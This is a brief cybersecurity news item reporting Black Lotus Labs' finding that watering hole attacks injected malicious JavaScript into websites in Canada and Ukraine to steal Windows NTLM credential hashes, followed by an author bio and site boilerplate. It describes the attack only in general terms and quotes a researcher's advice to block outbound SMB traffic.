Lumen Technologies' Black Lotus Labs identified a cyberthreat type called "watering hole attacks" that installs a malicious JavaScript function into a target website's code, FierceTelecom reports. The recently discovered threat have been used for several years, including in an April 2020 incident involving the San Francisco International Airport. The threat, which was identified on one website in Canada and on several websites in Ukraine, infects anyone who visited the sites, leaving them vulnerable to a theft of their Windows authentication credentials that could be used to impersonate the victims. According to researchers, the attack enables threat actors to obtain the New Technology LAN Manager hashes from the victims' devices which they will then use to get usernames and passwords. "To protect against this type of attack, organizations should configure their firewalls to prevent outbound SMB-based communications from leaving the network or consider turning off or limiting SMB in the corporate environment," said Black Lotus Labs' Mike Benjamin.
Threat intelligence
Lumen’s Black Lotus Labs flags ‘watering hole’ cyber threat
Jill Aitoro
Jill Aitoro is senior vice president of content strategy for CyberRisk Alliance. She has more than 20 years of experience editing and reporting on technology, business and policy. Prior to joining CRA, she worked at Sightline Media as editor of Defense News and executive editor of the Business-to-Government Group. She previously worked at Washington Business Journal and Nextgov, covering federal technology, contracting and policy, as well as CMP Media’s VARBusiness and CRN and Penton Media’s iSeries News.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news